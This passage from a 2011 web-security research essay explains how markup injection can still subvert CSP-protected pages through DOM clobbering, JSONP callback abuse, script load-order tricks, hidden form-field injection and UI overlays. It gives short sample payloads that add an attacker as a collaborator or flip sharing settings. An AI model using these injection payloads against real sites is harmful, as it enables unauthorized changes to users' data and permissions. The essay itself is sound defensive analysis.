namespace attacks One of the most straightforward state corruption vectors is based on id or name collisions between attacker-injected markup and legitimate contents of the page. The impact of such a collision is easy to illustrate using the example of a script-generated dialog, where the initial state of a configurable setting is captured using an editable control (typically <input>), and then read back through document.getElementById(...) and sent to the server: <input type='checkbox' id='is_public' checked> ? Injected markup ... // Legitimate application code follows function render_acl_dialog() { ... if (shared_publicly) dialog.innerHTML += '<input type="checkbox" id="is_public" checked>'; else dialog.innerHTML += '<input type="checkbox" id="is_public">'; ... } function acl_dialog_done() { ... if (document.getElementById('is_public').checked) ? Condition true regardless of user choice request.access_mode = AM_PUBLIC; ... } An even simpler example against a statically constructed dialog may be carried as follows:<input type='hidden' id='share_with' value='fredmbogo'> ? Injected markup ... Share this status update with: ? Legitimate optional element of a dialog <input id='share_with' value=''> ... function submit_status_update() { ... request.share_with = document.getElementById('share_with').value; ... } In both cases, the browser will allow the page to have several DOM elements with the same id parameter, but only the first, attacker-controlled value will be returned ongetElementById(...) lookups. The initial state of the configurable setting will be stored in one tag, but the attempt to read back the value later on will interact with another.The degree of user interaction required for this attack to succeed is application-specific, and may vary from zero to multiple clicks. The article proposes a method for making the user unwittingly interact with UI controls in section 3.3.3.1.2. Script namespace attacks The namespace attack discussed in the previous section may be also leveraged to directly interfere with the JavaScript execution environment, without relying on other HTML elements as a proxy. This is because of a little-known link between the markup and the script namespace: In all popular browsers, the identifiers attached to HTML tags are automatically registered in the JavaScript context associated with the page. This registration happens on two levels: For any type of a tag, a new node with a name matching the id parameter of the tag is inserted into the default object scope. In other words, <div id=test> will create a global variable test (of type HTMLDivElement), pointing to the DOM object associated with the tag.In this scenario, the mapping has a lower priority than any built-ins or variables previously created by on-page scripts. The behavior of identically named variables created later on is browser-specific. For several special tags, such as <img>, <iframe>, or <embed>, an entry for both the id and the name is additionally inserted into the document object. For example, <img name=test> will produce a node named document.test.This mapping has a higher priority than built-ins and script-created variables. An attacker capable of injecting passive markup may leverage this property in a manner illustrated in this code snippet:<img id='is_public'> ? Injected markup ... // Legitimate application code follows function retrieve_acls() { ... if (response.access_mode == AM_PUBLIC) ? The subsequent assignment fails in IE is_public = true; else is_public = false; } function submit_new_acls() { ... if (is_public) request.access_mode = AM_PUBLIC; ? Condition always evaluates to true ... } The consequences of this namespace pollution are made worse because the DOM objects associated with certain HTML elements have specialized methods for converting them to strings; this enables the attacker to attack not only simple Boolean conditions, but also to spoof numbers and strings: <a id='owner_user' href='fredmbogo'> ? Injected markup <img id='data_loaded''> ... // Legitimate application code follows function retrieve_data() { if (window.data_loaded) return; ? Condition met in browsers other than Firefox ... owner_user = response.owner; data_loaded = true; } function submit_new_acls() { ... request.can_edit = owner_user + ...; ? The string 'fredmbogo' is inserted request.can_read = owner_user + ...; ... } Several other exploitation venues appear to exist, but will be more closely tied to the design of the targeted application. It is, for example, possible to shadow built-ins such as document.domain, document.cookie, document.location, or document.referrer in order to interfere with certain security decisions; it is also trivial to disrupt the operation of methods such as document.createElement() or document.open(); fabricate the availability of the window.postMessage(...), window.crypto, or other security APIs; and more. 3.1.3. Script load order issues (CSP-specific) Script policing frameworks must necessarily seek compromise between the ease of deployment and the granularity of the offered security controls. In the case of Content Security Policy, this compromise may unexpectedly undermine the assurances offered to many real-world web apps.The key issue is that for the sake of simplicity, CSP relies on origin-level granularity: It is possible to control permissible script sources on a protocol, host, and port level, but not to specify individual script URLs - or the order they need to be loaded in. This design decision enables the attacker to load arbitrary scripts found anywhere on the site in an unexpected context, in an incorrect order, or an unplanned number of times.One trivial but plausible example where this capability may be used to put the application in an inconsistent state is illustrated below: <script src='initialize.js'></script>: ? Legitimate scripts var edited_text = ''; <script src='load_document.js'></script>: edited_text = server_response.text; ... setInterval(autosave_to_server, 10000); <script src='initialize.js'></script>: ? Injected script load var edited_text = ''; The possibility of loading scripts that use similar variable or function names, but belong to logically separate views, is perhaps more unsettling and more difficult to audit for; consider the following snippet of code: <script src='/admin/initialize.js'></script>: ? Injected script load ... initialized = true; <script src='/editor/editor.js'></script>: ? Legitimate scripts ... function load_data() { if (initialized) return; ... if (new_document) { acl_read_users = current_username; acl_write_users = current_username; ... } ... initialized = true; } ... function save_acls() { ... request.acl_read_users = acl_read_users; ? Submits user 'undefined' as a collaborator. request.acl_write_users = acl_write_users; ... } On any moderately complex website, it appears to be prohibitively difficult to account for all the possible interactions between hundreds of unrelated scripts. Further, it appears unlikely that webmasters would routinely appreciate the consequences of hosting nominally unused portions of JavaScript libraries, older versions of currently loaded scripts, or portions of JS used for testing or diagnostic purposes, anywhere within their WWW root. 3.1.4. Abuse of JSONP (CSP-specific) JSONP (JSON with padding) is a popular method for building JavaScript APIs. JSONP interfaces are frequently used to integrate with services provided by trusted third-party sites (e.g., to implement search or mapping capabilities), as well as to retrieve private first-party data (in this case, an additional Referer check or an XSRF token is commonly used).Regardless of the purpose, the integration with any JSONP API is achieved by including a script reference similar to this: <script src="http://example.com/find_store.php?zipcode=90210&callback=parse_response"></script> In response, the server dynamically generates a script structured roughly the following way:parse_response({ 'zipcode': '90210', 'results': [ '123 Evergreen Terrace', ... ]}); The inclusion of this response as a script results in the invocation of a client-specified callback - parse_response(...) - in the context of the calling page.Any CSP-enabled website that either offers JSONP feeds to others, or utilizes them internally, is automatically prone to a flavor of return-oriented programming: the attacker is able to invoke any functions of his choice, often with at least partly controllable parameters, by specifying them as the callback parameter on the API call: <script src='/editor/sharing.js'>: ? Legitimate script function set_sharing(public) { if (public) request.access_mode = AM_PUBLIC; else request.access_mode = AM_PRIVATE; ... } <script src='/search?q=a&call=set_sharing'>: ? Injected JSONP call set_sharing({ ... }) In addition, any JSONP interface that does not filter out parentheses or other syntax elements in the name of the callback function - a practice that has no special security consequences under normal operating conditions - will be vulnerable to an even more straightforward attack: <script src='/search?q=a&call=alert(1)'></script> 3.1.5. Selective removal of scripts (specific to XSS filters) The last script-related vector that deserves a brief mention in this document is associated with the use of reflected cross-site scripting filters. XSS filters are a security feature designed to selectively remove suspected XSS exploitation attempts from the rendered HTML. They do so by looking for scripting-capable markup that appears to correspond to a potentially attacker-controlled parameter present in the underlying HTTP request. For example, if a request for /search?q=<script>alert(1)</script>returns a page containing <script>alert(1)</script> in its markup, that snippet of HTML will be removed by the filter to stop possible exploitation of an XSS flaw.Because of the fully passive design of the detection stage, cross-site scripting filters have the unfortunate property of being prone to attacker-triggered false positives: By quoting a snippet of a legitimate script present on the page, the XSS filter may be duped into removing this block of code, while permitting any remaining <script> segments or inline event handlers to execute. This behavior has the potential to place the targeted application in an inconsistent state, which may be exploitable in a manner similar to the attacks outlined in section 3.1.3. 3.2. Form parameter injection The JavaScript-centric exploitation strategies discussed previously are an attractive target for attackers, but even in absence of complex scripts, markup injection may be leveraged to alter the state of the application. The disruption of HTML forms is one of the examples of a method independent of any client-side JavaScript: By injecting additional <input type='hidden'> fields in the vicinity of an existing state-changing form, the attacker may trivially change the way the server interprets the intent behind the eventual submission, e.g.: <form action='/change_settings.php'> <input type='hidden' name='invite_user' value='fredmbogo'> ? Injected lines <form action="/change_settings.php"> ? Existing form (ignored by the parser) ... <input type="text" name="invite_user" value=""> ? Subverted field ... <input type="hidden" name="xsrf_token" value="12345"> ... </form> A vast majority of web frameworks will only interpret the first occurrence of invite_user in the submitted form, and will add the account of attacker's choice as a collaborator.Further, because a significant number of frameworks also use XSRF tokens that are not scoped to individual forms, the attack proposed in section 2.6. may be combined with this approach in order to reuse an existing token and submit data to an unrelated state-changing form: <form action='/change_settings.php'> <input type='hidden' name='invite_user' value='fredmbogo'> ? Injected lines <form action="/update_status.php"> ? Existing form (ignored by the parser) ... <input type="text" name="message" value=""> ? Existing field (ignored by /change_settings.php) ... <input type="hidden" name="xsrf_token" value="12345"> ... </form> 3.3. UI-level attacks It should be apparent that the ability to inject passive markup is often sufficient to disrupt the underlying logic of the targeted application. The other important and frequently overlooked aspect of the security of any web application is the integrity of its user interface.In analyzing the impact of markup injection vulnerabilities, we must consider the possibility that the attacker will use stylesheets, perhaps combined with legacy HTML positioning directives, to overlay own content on top of legitimate UI controls and alter their apparent purpose, without affecting the scripted behaviors associated with user actions. For example, it may be possible to skin a document sharing dialog as a harmless and friendly notification, without changing the underlying semantics of the "OK" button displayed therein.Although the most recent specification of CSP disallows inline stylesheets to protect against an unrelated weakness, the attacker is still free to load any other standalone stylesheet found within any of the whitelisted origins, and reuse any of the offered classes normally used to construct the legitimate UI; therefore, such an attack is very likely to be feasible.Another area of concern is that the occurrence of a click or other simple UI action is not necessarily indicative of informed consent. The attacker may trick the user into unwittingly interacting with the targeted application by predicting the timing of a premeditated click, and rapidly transitioning between two documents or two simultaneously open windows; this problem is one of the unsolved challenges in browser engineering, and is discussed in more detail on this page. The context-switching attack may be used separately, or may be leveraged in conjunction with any of the exfiltration or state change techniques discussed here to work around the normally required degree of interaction with the vulnerable page. 3.4. Abuse of special privileges In addition to the attacks on application logic and the apparent function of UI controls, markup injection vulnerabilities may be leveraged to initiate certain privileged actions in a way that bypasses normal security restrictions placed on untrusted sites. These attacks are of less interest from the technical perspective, but are of significant practical concern.Examples of privilege-based attacks that may be delivered over passive HTML markup include: Updating OpenSearch registrations associated with the site to subvert the search integration capabilities integrated into the browser. Initiating the download and installation of extensions, themes, or updates (if the compromised origin is recognized as privileged by one of the mechanisms built into the browser). Instantiating site-locked plugins or ActiveX extensions with attacker-controlled parameters. Starting file downloads or providing misleading and dangerous advice to the user; the user is trained to make trust decisions based on the indicators provided in the address bar, so this offers a qualitative difference in comparison to traditional phishing. 4. Practical limitations of XSS defenses The exfiltration and infiltration methods discussed in this document were chosen by their proximity to the attack outcomes that script containment frameworks hope to prevent, and to the technological domains they operate in. I also shied away from including a detailed discussion of transient and easily correctable glitches in the scope or operation of these mechanisms.A more holistic assessment of these frameworks must recognize, however, that their application is limited to HTML documents, and even more specifically, to documents that are expected ahead of the time to be displayed by the browser as HTML. The existing frameworks have no control over any subresources that may be interpreted by specialized XML parsers or routed to plugins; in that last case, the hosting party has very little control over the process, too.Another practical consideration is that despite being envisioned by security experts, the complexity of interactions with various browser features requires the frameworks to be constantly revised to account for a number of significant loopholes. Some of the notable issues in the relatively short life of CSP included the ability to spoof scripts by pointing <script> tags to non-script documents with partly attacker-controlled contents (originally fixed with strict MIME type matching); the ability to use CSS3 complex selectors to exfiltrate data (addressed by disallowing inline stylesheets); or the ability to leverage accessibility features to implement rudimentary keylogging. This list will probably grow. 5. Conclusion There is no doubt that the recently proposed security measures offer a clear quantitative benefit by rendering the exploitation of markup vulnerabilities more difficult, and dependent on a greater number of application-specific prerequisites.At the same time, I hope to have demonstrated that web applications protected by frameworks such as CSP are still likely to suffer significant security consequences in case of a markup injection flaw. I believe that in many real-world scenarios, the qualitative difference offered by the aforementioned mechanisms is substantially less than expected.It may be useful to compare these measures to the approaches used to mitigate the impact of stack buffer overflows: The use of address space layout randomization, non-executable stack segments, and stack canaries have made exploitation of certain implementation issues more difficult, but reliably prevented it only in a relatively small fraction of cases.For as long as web documents are routinely produced and exchanged as serialized HTML, markup injection will remain a security threat. To address the problem fully, one may flirt with the idea of replacing serialized HTML with parsed, binary DOM trees that are be directly exchanged between the server and the client, and between portions of client-side JavaScript. The performance benefits associated with this design would probably encourage client- and server-side frameworks to limit the use of serialized HTML documents in complex web apps.[Originally published in December 2011] Sursa: http://lcamtuf.coredump.cx/postxss/